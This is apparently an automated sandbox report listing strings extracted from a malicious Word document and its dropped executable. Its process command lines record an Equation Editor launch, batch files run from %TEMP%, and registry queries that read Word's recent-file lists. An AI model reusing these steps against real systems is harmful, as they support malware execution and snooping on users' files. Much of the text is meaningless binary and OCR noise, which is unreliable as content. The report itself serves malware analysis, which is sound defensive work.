Ansi based on Dropped File (~WRC0000.tmp)

PIhW,|fdCZ8`iFOYt#E

Ansi based on Dropped File (~WRC0000.tmp)

PK!+:P[Content_Types].xml (n0ED(,g6@]t#_0}QMl15YS@D]I[kUSx-76Ve'Qn

Ansi based on Dropped File (~WRC0000.tmp)

q vh{nx=rbxpBwA3Q|&^7;l,{>4".7*YIK8_ummmhE#-U9ib_+IS(5m&gk]b

Ansi based on Dropped File (~WRC0000.tmp)

Q+ONQ&,A!@cOJ*]2`:@1xaC

Ansi based on Dropped File (~WRC0000.tmp)

Qw,T}LncIYFYl/XqVB^Fp2lo4X(|N1l>`f+gg<:_V=Y

Ansi based on Dropped File (~WRC0000.tmp)

QWDWIzI}4e+*b|:0sEpw{XuTZ?ej(dTdNe_\0)}c>V[*?2#

Ansi based on Dropped File (~WRC0000.tmp)

R!y+Un;*&/HrT>>\

Ansi based on Dropped File (~WRC0000.tmp)

RuK>V.EL+M2#'fi~Vvl{u8zH

Ansi based on Dropped File (~WRC0000.tmp)

S/$0O:QbgH(AZ[n)B(#1TJ4~%&.U]_oQh;;l]-e!2Y)?yh\e?e,OUxB*sP}br>aM|XKdPK!)H w>#word/glossary/stylesWithEffects.xml[r8}SR{Iv3-1'%N-KX#v_yq"d8wGoCOD8w:Ie+O"I_}8 L.7w7i]Ke"O^2^

Ansi based on Dropped File (~WRC0000.tmp)

S; Z~!P9giC!#B,;X=,I2UWV9$lk=Aj;{AP79|s*Y;[MChf]o{oY=1kyVV5E8Vk+\80X4D)!!?*|fv

Ansi based on Dropped File (~WRC0000.tmp)

Sd\17pa>SR!

Ansi based on Dropped File (~WRC0000.tmp)

S{G$FTbGhd,Jy&XwfZjfdG[kuRADi*(XxlTB

Ansi based on Dropped File (~WRC0000.tmp)

t6v[r_\,Wyl5SZR.ydzm<[. [G"(cV-wrUnso;nYJk[\3NqK^&"O![=g)v/Qswza@qh0[\M)1?V#m{Xe}\^yXwC\`obg$~"i77Jc

Ansi based on Dropped File (~WRC0000.tmp)

TTIIvt]KcK#v5+|D~O@%\w_nN[L9KqgVhn

Ansi based on Dropped File (~WRC0000.tmp)

u"xA@T_q64)kuV7t'%;i9s9x,-45xd8?d/Y|t&LILJ`& -Gt/PK!-

Ansi based on Dropped File (~WRC0000.tmp)

U3"&$DM7q~wprB

Ansi based on Dropped File (~WRC0000.tmp)

u3KGnD1NIBs

Ansi based on Dropped File (~WRC0000.tmp)

uV4(Tn

Ansi based on Dropped File (~WRC0000.tmp)

uXnQh,C\/O'sd@Fk4/)x"*DI"EE@U+tbp{|VJ9`oLQ7{<-Qn"^VQ=`:n#WAroJ-W)2)"[Eyw)Yu:y]wa7G4NUn>l}2GxBP}Er$

Ansi based on Dropped File (~WRC0000.tmp)

v-%oO$u~W8kX8]nddbKzP]|{ dZGJS90_t$4aJ=yx=84)I;58 duG%*

Ansi based on Dropped File (~WRC0000.tmp)

VSA"3(O5$aE'p,#$[G)A*R~t*N7r0q^CBz8~f/1\\R+@N

Ansi based on Dropped File (~WRC0000.tmp)

W+7`gJj|h(KD-

Ansi based on Dropped File (~WRC0000.tmp)

Wj>Jf]=Y`YE~}q=j]u3m[tOx?nBm,fbk(x};q|.QK2h^ZC`[GeD~Yq~1CT!qb

Ansi based on Dropped File (~WRC0000.tmp)

Wl$(ELrc#W4*qAv/"K}A]4 )Bqu>V!v}:NCV?30[^ 0f"Bu4B<Yv}R2^^5"wDOIP[ta%|C-]hwICGC"ZWA~T_{:iZ=Pirs;!#

Ansi based on Dropped File (~WRC0000.tmp)

word/glossary/settings.xmlUmO0>iIJaSD?Io:;_s

Ansi based on Dropped File (~WRC0000.tmp)

xd>Gx[d3n:Z&P(}*1j>]:|LAn"Vn0f+"U*Sp8R<[?Rv]H"C ;Aki Umq63 |8W-<:$TdX|/aSM<9d._wPK!^`word/settings.xmlUN@}$HPJ"Y7_Y7F

Ansi based on Dropped File (~WRC0000.tmp)

x}rxwr:\TZaG*y8IjbRc|XI

Ansi based on Dropped File (~WRC0000.tmp)

Y.9PJ3C;S

Ansi based on Dropped File (~WRC0000.tmp)

YPQkV5+<L5 > d#J7Jxb6\l;+(>(Z83&auYh0Z1mMys!"N$I,SyeZ.6,x7sGEb%kf&1I|a8xB@a"\xY^&_~X~iWzIZI;P/X;#WJ1eeZ6%=I1p:C@d

Ansi based on Dropped File (~WRC0000.tmp)

Z-OeTr;-#%

Ansi based on Dropped File (~WRC0000.tmp)

z[,P/B

Ansi based on Dropped File (~WRC0000.tmp)

{$DvxrR@^V?=u]V6))+`{`EVNzx%cdR}`e;tg]T5

Ansi based on Dropped File (~WRC0000.tmp)

~JTe\O*tHGHY}KNP*T9/#A7qZ$*c?qUnwN%Oi4=3N)cbJ

Ansi based on Dropped File (~WRC0000.tmp)

~x`jjU <XPU 6oF~x#(5A!g&V,rj,+u8,~^E4#ohxCo

Ansi based on Dropped File (~WRC0000.tmp)

~x`jjU <XPU 6ox#(5A!g&V,rj,+WQ"G#8

Ansi based on Dropped File (~WRC0000.tmp)

~xM`ijU <8PU 6<+x(5@aG&N,vj,'`&8#oh&w?d<&4*[*[o#]vMST';@5:k&017q8M

Ansi based on Dropped File (~WRC0000.tmp)

~xM`ijU <8PU 6sp^|<us2p$*pJlD}Vt@`!T?($%TxOTN/1Sa{iy;h'5h2]EvCCPc>xCG^T>sx8bUD?P/k@+TnBc?Wymn:+NOxmQ|cHwq$>`hbg-`z7xp3d>bW9uZc&?q-\&wXk*U>>8V'c?';'kAY_(S1Go-

Ansi based on Dropped File (~WRC0000.tmp)

~xM`ijU <8PU |

Ansi based on Dropped File (~WRC0000.tmp)

~xM`x@ly(AU&pPqv&Pj7NMPK&J#osx@3@88aG#p'[JM7To

Ansi based on Dropped File (~WRC0000.tmp)

%PROGRAMFILES%\Microsoft Office\Office14\wwlib.dll

Unicode based on Runtime Data (WINWORD.EXE )

%WINDIR%\system32\apphelp.dll

Unicode based on Runtime Data (WINWORD.EXE )

@%SystemRoot%\system32\packager.dll,-2000

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\New Microsoft Word Document.docx

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D3BBA56FE78C40][O00000000]*C:\

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D3BBA56FEDA6C0][O00000000]*C:\5635DF453843.doc

Unicode based on Runtime Data (WINWORD.EXE )

AgentAnim

Unicode based on Runtime Data (WINWORD.EXE )

AutoConfigURL

Unicode based on Runtime Data (WINWORD.EXE )

AutoDetect

Unicode based on Runtime Data (WINWORD.EXE )

en-US

Unicode based on Runtime Data (WINWORD.EXE )

IETldDllVersionHigh

Unicode based on Runtime Data (WINWORD.EXE )

IETldDllVersionLow

Unicode based on Runtime Data (WINWORD.EXE )

IETldVersionHigh

Unicode based on Runtime Data (WINWORD.EXE )

IETldVersionLow

Unicode based on Runtime Data (WINWORD.EXE )

IntranetName

Unicode based on Runtime Data (WINWORD.EXE )

Item 1

Unicode based on Runtime Data (WINWORD.EXE )

Item 10

Unicode based on Runtime Data (WINWORD.EXE )

Item 11

Unicode based on Runtime Data (WINWORD.EXE )

Item 12

Unicode based on Runtime Data (WINWORD.EXE )

Item 13

Unicode based on Runtime Data (WINWORD.EXE )

Item 14

Unicode based on Runtime Data (WINWORD.EXE )

Item 15

Unicode based on Runtime Data (WINWORD.EXE )

Item 16

Unicode based on Runtime Data (WINWORD.EXE )

Item 17

Unicode based on Runtime Data (WINWORD.EXE )

Item 18

Unicode based on Runtime Data (WINWORD.EXE )

Item 19

Unicode based on Runtime Data (WINWORD.EXE )

Item 2

Unicode based on Runtime Data (WINWORD.EXE )

Item 20

Unicode based on Runtime Data (WINWORD.EXE )

Item 21

Unicode based on Runtime Data (WINWORD.EXE )

Item 22

Unicode based on Runtime Data (WINWORD.EXE )

Item 23

Unicode based on Runtime Data (WINWORD.EXE )

Item 24

Unicode based on Runtime Data (WINWORD.EXE )

Item 25

Unicode based on Runtime Data (WINWORD.EXE )

Item 26

Unicode based on Runtime Data (WINWORD.EXE )

Item 27

Unicode based on Runtime Data (WINWORD.EXE )

Item 28

Unicode based on Runtime Data (WINWORD.EXE )

Item 29

Unicode based on Runtime Data (WINWORD.EXE )

Item 3

Unicode based on Runtime Data (WINWORD.EXE )

Item 30

Unicode based on Runtime Data (WINWORD.EXE )

Item 31

Unicode based on Runtime Data (WINWORD.EXE )

Item 32

Unicode based on Runtime Data (WINWORD.EXE )

Item 33

Unicode based on Runtime Data (WINWORD.EXE )

Item 34

Unicode based on Runtime Data (WINWORD.EXE )

Item 35

Unicode based on Runtime Data (WINWORD.EXE )

Item 36

Unicode based on Runtime Data (WINWORD.EXE )

Item 37

Unicode based on Runtime Data (WINWORD.EXE )

Item 38

Unicode based on Runtime Data (WINWORD.EXE )

Item 39

Unicode based on Runtime Data (WINWORD.EXE )

Item 4

Unicode based on Runtime Data (WINWORD.EXE )

Item 40

Unicode based on Runtime Data (WINWORD.EXE )

Item 41

Unicode based on Runtime Data (WINWORD.EXE )

Item 42

Unicode based on Runtime Data (WINWORD.EXE )

Item 43

Unicode based on Runtime Data (WINWORD.EXE )

Item 44

Unicode based on Runtime Data (WINWORD.EXE )

Item 45

Unicode based on Runtime Data (WINWORD.EXE )

Item 46

Unicode based on Runtime Data (WINWORD.EXE )

Item 47

Unicode based on Runtime Data (WINWORD.EXE )

Item 48

Unicode based on Runtime Data (WINWORD.EXE )

Item 49

Unicode based on Runtime Data (WINWORD.EXE )

Item 5

Unicode based on Runtime Data (WINWORD.EXE )

Item 50

Unicode based on Runtime Data (WINWORD.EXE )

Item 6

Unicode based on Runtime Data (WINWORD.EXE )

Item 7

Unicode based on Runtime Data (WINWORD.EXE )

Item 8

Unicode based on Runtime Data (WINWORD.EXE )

Item 9

Unicode based on Runtime Data (WINWORD.EXE )

LanguageList

Unicode based on Runtime Data (WINWORD.EXE )

Max Display

Unicode based on Runtime Data (WINWORD.EXE )

MSOBALLOON

Unicode based on Runtime Data (WINWORD.EXE )

MsoHelp10

Unicode based on Runtime Data (WINWORD.EXE )

mspim_wnd32

Unicode based on Runtime Data (WINWORD.EXE )

NextUpdate

Unicode based on Runtime Data (WINWORD.EXE )

Package

Unicode based on Runtime Data (WINWORD.EXE )

ProductFiles

Unicode based on Runtime Data (WINWORD.EXE )

ProductNonBootFilesIntl_1033

Unicode based on Runtime Data (WINWORD.EXE )

ProxyBypass

Unicode based on Runtime Data (WINWORD.EXE )

ProxyEnable

Unicode based on Runtime Data (WINWORD.EXE )

ProxyOverride

Unicode based on Runtime Data (WINWORD.EXE )

ProxyServer

Unicode based on Runtime Data (WINWORD.EXE )

SavedLegacySettings

Unicode based on Runtime Data (WINWORD.EXE )

Site 1

Unicode based on Runtime Data (WINWORD.EXE )

Site 10

Unicode based on Runtime Data (WINWORD.EXE )

Site 11

Unicode based on Runtime Data (WINWORD.EXE )

Site 12

Unicode based on Runtime Data (WINWORD.EXE )

Site 13

Unicode based on Runtime Data (WINWORD.EXE )

Site 14

Unicode based on Runtime Data (WINWORD.EXE )

Site 15

Unicode based on Runtime Data (WINWORD.EXE )

Site 16

Unicode based on Runtime Data (WINWORD.EXE )

Site 17

Unicode based on Runtime Data (WINWORD.EXE )

Site 18

Unicode based on Runtime Data (WINWORD.EXE )

Site 19

Unicode based on Runtime Data (WINWORD.EXE )

Site 2

Unicode based on Runtime Data (WINWORD.EXE )

Site 20

Unicode based on Runtime Data (WINWORD.EXE )

Site 3

Unicode based on Runtime Data (WINWORD.EXE )

Site 4

Unicode based on Runtime Data (WINWORD.EXE )

Site 5

Unicode based on Runtime Data (WINWORD.EXE )

Site 6

Unicode based on Runtime Data (WINWORD.EXE )

Site 7

Unicode based on Runtime Data (WINWORD.EXE )

Site 8

Unicode based on Runtime Data (WINWORD.EXE )

Site 9

Unicode based on Runtime Data (WINWORD.EXE )

StaleIETldCache

Unicode based on Runtime Data (WINWORD.EXE )

TLDUpdates

Unicode based on Runtime Data (WINWORD.EXE )

UNCAsIntranet

Unicode based on Runtime Data (WINWORD.EXE )

WORDFiles

Unicode based on Runtime Data (WINWORD.EXE )

ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½

Ansi based on Runtime Data (WINWORD.EXE )

ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½

Ansi based on Runtime Data (WINWORD.EXE )

ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½

Ansi based on Runtime Data (WINWORD.EXE )

Ansi based on Runtime Data (WINWORD.EXE )

%windir%\tracing

Unicode based on Runtime Data (exe.exe )

.rdata

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.00400000.00000040.mdmp)

.rdata$zzzdbg

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.00400000.00000040.mdmp)

.text

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.00400000.00000040.mdmp)

.text$mn

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.00400000.00000040.mdmp)

@.rsrc

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.00400000.00000040.mdmp)

`.rdata

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.00400000.00000040.mdmp)

CancelIo

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

ConsoleTracingMask

Unicode based on Runtime Data (exe.exe )

CopyFileW

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

EnableConsoleTracing

Unicode based on Runtime Data (exe.exe )

EnableFileTracing

Unicode based on Runtime Data (exe.exe )

FileDirectory

Unicode based on Runtime Data (exe.exe )

FileTracingMask

Unicode based on Runtime Data (exe.exe )

FindClose

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

FindFirstFileA

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

FindFirstFileW

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

FindNextFileW

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

FormatMessageA

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

GetCurrentProcessId

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

GetCurrentThreadId

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

GetFileAttributesW

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

GetFullPathNameW

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

GetSystemTimeAsFileTime

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

InterlockedCompareExchange

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

InterlockedExchange

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

IsDebuggerPresent

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

KERNEL32.dll

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

MaxFileSize

Unicode based on Runtime Data (exe.exe )

QueryPerformanceCounter

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

SetFileAttributesW

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

SetUnhandledExceptionFilter

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

Sleep

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

TlsAlloc

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

UnhandledExceptionFilter

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

VirtualProtect

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.0040B000.00000080.mdmp)

ZBome

Ansi based on Memory/File Scan (exe.exe , 00018163-00002300.00000002.24655.00400000.00000040.mdmp)

ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½

Ansi based on Runtime Data (exe.exe )

ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½

Ansi based on Runtime Data (exe.exe )

ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½

Ansi based on Runtime Data (exe.exe )

ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½ï¿½

Ansi based on Runtime Data (exe.exe )

Ansi based on Runtime Data (exe.exe )

Ansi based on Runtime Data (exe.exe )

Ansi based on Runtime Data (exe.exe )

'''''''

Ansi based on Image Processing (screen_6.png)

'_lllla

Ansi based on Image Processing (screen_6.png)

,,,_,,,

Ansi based on Image Processing (screen_6.png)

-JL'_P_

Ansi based on Image Processing (screen_6.png)

_/_=_--',__-_-,_-_-,J

Ansi based on Image Processing (screen_6.png)

_0____8

Ansi based on Image Processing (screen_6.png)

_^^''

Ansi based on Image Processing (screen_6.png)

__0__@_'

Ansi based on Image Processing (screen_6.png)

_____:_,____

Ansi based on Image Processing (screen_6.png)

_____=____=?_

Ansi based on Image Processing (screen_6.png)

_______

Ansi based on Image Processing (screen_6.png)

_han.__

Ansi based on Image Processing (screen_6.png)

_L'Jt

Ansi based on Image Processing (screen_6.png)

_ldi1-ul_

Ansi based on Image Processing (screen_6.png)

_n__::_::_

Ansi based on Image Processing (screen_6.png)

_ncirt

Ansi based on Image Processing (screen_6.png)

A.._,

Ansi based on Image Processing (screen_6.png)

aln_l

Ansi based on Image Processing (screen_6.png)

B_U_xx'

Ansi based on Image Processing (screen_6.png)

c_t._;.,.

Ansi based on Image Processing (screen_6.png)

CliPbOard

Ansi based on Image Processing (screen_6.png)

Editing

Ansi based on Image Processing (screen_6.png)

JvJcP._p_ac_

Ansi based on Image Processing (screen_6.png)

m;cr0c0ttw0rd

Ansi based on Image Processing (screen_6.png)

Mailingc

Ansi based on Image Processing (screen_6.png)

Pa9iL_0ut

Ansi based on Image Processing (screen_6.png)

Paragraph

Ansi based on Image Processing (screen_6.png)

Patti

Ansi based on Image Processing (screen_6.png)

Rewim

Ansi based on Image Processing (screen_6.png)

RMirincic

Ansi based on Image Processing (screen_6.png)

SNlgt

Ansi based on Image Processing (screen_6.png)

Ward_:O

Ansi based on Image Processing (screen_6.png)

}_Fin.J

Ansi based on Image Processing (screen_6.png)

''-''

Ansi based on Image Processing (screen_3.png)

',,';c_'c_

Ansi based on Image Processing (screen_3.png)

,,_'_P'

Ansi based on Image Processing (screen_3.png)

,_,_.

Ansi based on Image Processing (screen_3.png)

,__8_

Ansi based on Image Processing (screen_3.png)

563sD_s_3;

Ansi based on Image Processing (screen_3.png)

5Ä35cFJ53_J3

Ansi based on Image Processing (screen_3.png)

:._---_-

Ansi based on Image Processing (screen_3.png)

;-________

Ansi based on Image Processing (screen_3.png)

_,_1cc_e_

Ansi based on Image Processing (screen_3.png)

_,_1i,__'c_.crt

Ansi based on Image Processing (screen_3.png)

_0___

Ansi based on Image Processing (screen_3.png)

_::_::_

Ansi based on Image Processing (screen_3.png)

____80

Ansi based on Image Processing (screen_3.png)

_____

Ansi based on Image Processing (screen_3.png)

______

Ansi based on Image Processing (screen_3.png)

________

Ansi based on Image Processing (screen_3.png)

__Rgplacg

Ansi based on Image Processing (screen_3.png)

_COpY

Ansi based on Image Processing (screen_3.png)

_diting

Ansi based on Image Processing (screen_3.png)

_elinked_les_

Ansi based on Image Processing (screen_3.png)

_i8_0_

Ansi based on Image Processing (screen_3.png)

_les.

Ansi based on Image Processing (screen_3.png)

_n_ins

Ansi based on Image Processing (screen_3.png)

appr0ximati

Ansi based on Image Processing (screen_3.png)

changg

Ansi based on Image Processing (screen_3.png)

charactirc

Ansi based on Image Processing (screen_3.png)

Clipbaard

Ansi based on Image Processing (screen_3.png)

daaJment

Ansi based on Image Processing (screen_3.png)

daalment

Ansi based on Image Processing (screen_3.png)

FOrmatPaintir

Ansi based on Image Processing (screen_3.png)

i_______

Ansi based on Image Processing (screen_3.png)

In_ik

Ansi based on Image Processing (screen_3.png)

Mailing_

Ansi based on Image Processing (screen_3.png)

MH_Wa_

Ansi based on Image Processing (screen_3.png)

PagiLayaut

Ansi based on Image Processing (screen_3.png)

ri_cn_pati_i_it_,.'

Ansi based on Image Processing (screen_3.png)

Rifirinci_

Ansi based on Image Processing (screen_3.png)

Riviiw

Ansi based on Image Processing (screen_3.png)

s__g,.

Ansi based on Image Processing (screen_3.png)

ShawH_p__

Ansi based on Image Processing (screen_3.png)

Silict_

Ansi based on Image Processing (screen_3.png)

SNle_

Ansi based on Image Processing (screen_3.png)

upda_

Ansi based on Image Processing (screen_3.png)

va_uit,

Ansi based on Image Processing (screen_3.png)

-Embedding

Ansi based on Process Commandline (EQNEDT32.EXE)

-x -s 1948

Ansi based on Process Commandline (DW20.EXE)

.rsrc

Ansi based on Dropped File (exe.exe.634531026)

@.data

Ansi based on Dropped File (exe.exe.634531026)

H:?@@

Ansi based on Dropped File (exe.exe.634531026)

j@@jS

Ansi based on Dropped File (exe.exe.634531026)

LT@k(

Ansi based on Dropped File (exe.exe.634531026)

Ti%$<

Ansi based on Dropped File (exe.exe.634531026)

wwwwh

Ansi based on Dropped File (exe.exe.634531026)

/C %TEMP%\TaSk.BaT

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\10.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\11.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\12.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\14.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\8.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/c REG QUERY "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\9.0\Word\File MRU" /v "Item 1"

Ansi based on Process Commandline (cmd.exe)

/K %TEMP%\2nd.bat

Ansi based on Process Commandline (cmd.exe)

/n "%USERPROFILE%\Desktop\New Microsoft Word Document.docx"

Ansi based on Process Commandline (WINWORD.EXE)

/n "C:\5635DF453843.doc"

Ansi based on Process Commandline (WINWORD.EXE)

0,_,_

Ansi based on Image Processing (screen_0.png)

?v__?_

Ansi based on Image Processing (screen_0.png)

_-___M__

Ansi based on Image Processing (screen_0.png)

_??_?_

Ansi based on Image Processing (screen_0.png)

_?m_q?

Ansi based on Image Processing (screen_0.png)

__?J?_?_m_?_____m??mu?___?_______

Ansi based on Image Processing (screen_0.png)

___?_________

Ansi based on Image Processing (screen_0.png)

_______cJ?_L_

Ansi based on Image Processing (screen_0.png)

__v________

Ansi based on Image Processing (screen_0.png)

_m____qJ_?_

Ansi based on Image Processing (screen_0.png)

_sct_c_J_lnJ9r1_crcsc_crccr_tlcn_nllrl9htsr_s___d

Ansi based on Image Processing (screen_0.png)

c_nc___

Ansi based on Image Processing (screen_0.png)

off_-ce_

Ansi based on Image Processing (screen_0.png)

r__?J___m_

Ansi based on Image Processing (screen_0.png)

Word2o1o

Ansi based on Image Processing (screen_0.png)

019C826E445A4649A5B00BF08FCC4EEE

Unicode based on Runtime Data (WINWORD.EXE )

@Arial Unicode MS

Unicode based on Runtime Data (WINWORD.EXE )

@Batang

Unicode based on Runtime Data (WINWORD.EXE )

@BatangChe

Unicode based on Runtime Data (WINWORD.EXE )

@DFKai-SB

Unicode based on Runtime Data (WINWORD.EXE )

@Dotum

Unicode based on Runtime Data (WINWORD.EXE )

@DotumChe

Unicode based on Runtime Data (WINWORD.EXE )

@FangSong

Unicode based on Runtime Data (WINWORD.EXE )

@Gulim

Unicode based on Runtime Data (WINWORD.EXE )

@GulimChe

Unicode based on Runtime Data (WINWORD.EXE )

@Gungsuh

Unicode based on Runtime Data (WINWORD.EXE )

@GungsuhChe

Unicode based on Runtime Data (WINWORD.EXE )

@KaiTi

Unicode based on Runtime Data (WINWORD.EXE )

@Malgun Gothic

Unicode based on Runtime Data (WINWORD.EXE )

@Meiryo

Unicode based on Runtime Data (WINWORD.EXE )

@Meiryo UI

Unicode based on Runtime Data (WINWORD.EXE )

@Microsoft JhengHei

Unicode based on Runtime Data (WINWORD.EXE )

@Microsoft YaHei

Unicode based on Runtime Data (WINWORD.EXE )

@MingLiU

Unicode based on Runtime Data (WINWORD.EXE )

@MingLiU-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

@MingLiU_HKSCS

Unicode based on Runtime Data (WINWORD.EXE )

@MingLiU_HKSCS-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

@MS Gothic

Unicode based on Runtime Data (WINWORD.EXE )

@MS Mincho

Unicode based on Runtime Data (WINWORD.EXE )

@MS PGothic

Unicode based on Runtime Data (WINWORD.EXE )

@MS PMincho

Unicode based on Runtime Data (WINWORD.EXE )

@MS UI Gothic

Unicode based on Runtime Data (WINWORD.EXE )

@NSimSun

Unicode based on Runtime Data (WINWORD.EXE )

@PMingLiU

Unicode based on Runtime Data (WINWORD.EXE )

@PMingLiU-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

@SimHei

Unicode based on Runtime Data (WINWORD.EXE )

@SimSun

Unicode based on Runtime Data (WINWORD.EXE )

@SimSun-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

Agency FB

Unicode based on Runtime Data (WINWORD.EXE )

Aharoni

Unicode based on Runtime Data (WINWORD.EXE )

Algerian

Unicode based on Runtime Data (WINWORD.EXE )

Andalus

Unicode based on Runtime Data (WINWORD.EXE )

Angsana New

Unicode based on Runtime Data (WINWORD.EXE )

AngsanaUPC

Unicode based on Runtime Data (WINWORD.EXE )

Aparajita

Unicode based on Runtime Data (WINWORD.EXE )

Arabic Typesetting

Unicode based on Runtime Data (WINWORD.EXE )

Arial Black

Unicode based on Runtime Data (WINWORD.EXE )

Arial Narrow

Unicode based on Runtime Data (WINWORD.EXE )

Arial Rounded MT Bold

Unicode based on Runtime Data (WINWORD.EXE )

Arial Unicode MS

Unicode based on Runtime Data (WINWORD.EXE )

Baskerville Old Face

Unicode based on Runtime Data (WINWORD.EXE )

Batang

Unicode based on Runtime Data (WINWORD.EXE )

BatangChe

Unicode based on Runtime Data (WINWORD.EXE )

Bauhaus 93

Unicode based on Runtime Data (WINWORD.EXE )

Bell MT

Unicode based on Runtime Data (WINWORD.EXE )

Berlin Sans FB

Unicode based on Runtime Data (WINWORD.EXE )

Berlin Sans FB Demi

Unicode based on Runtime Data (WINWORD.EXE )

Bernard MT Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Blackadder ITC

Unicode based on Runtime Data (WINWORD.EXE )

Bodoni MT

Unicode based on Runtime Data (WINWORD.EXE )

Bodoni MT Black

Unicode based on Runtime Data (WINWORD.EXE )

Bodoni MT Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Bodoni MT Poster Compressed

Unicode based on Runtime Data (WINWORD.EXE )

Book Antiqua

Unicode based on Runtime Data (WINWORD.EXE )

Bookman Old Style

Unicode based on Runtime Data (WINWORD.EXE )

Bookshelf Symbol 7

Unicode based on Runtime Data (WINWORD.EXE )

Bradley Hand ITC

Unicode based on Runtime Data (WINWORD.EXE )

Britannic Bold

Unicode based on Runtime Data (WINWORD.EXE )

Broadway

Unicode based on Runtime Data (WINWORD.EXE )

Browallia New

Unicode based on Runtime Data (WINWORD.EXE )

BrowalliaUPC

Unicode based on Runtime Data (WINWORD.EXE )

Brush Script MT

Unicode based on Runtime Data (WINWORD.EXE )

Calibri

Unicode based on Runtime Data (WINWORD.EXE )

Californian FB

Unicode based on Runtime Data (WINWORD.EXE )

Calisto MT

Unicode based on Runtime Data (WINWORD.EXE )

Cambria

Unicode based on Runtime Data (WINWORD.EXE )

Cambria Math

Unicode based on Runtime Data (WINWORD.EXE )

Candara

Unicode based on Runtime Data (WINWORD.EXE )

Castellar

Unicode based on Runtime Data (WINWORD.EXE )

Centaur

Unicode based on Runtime Data (WINWORD.EXE )

Century

Unicode based on Runtime Data (WINWORD.EXE )

Century Gothic

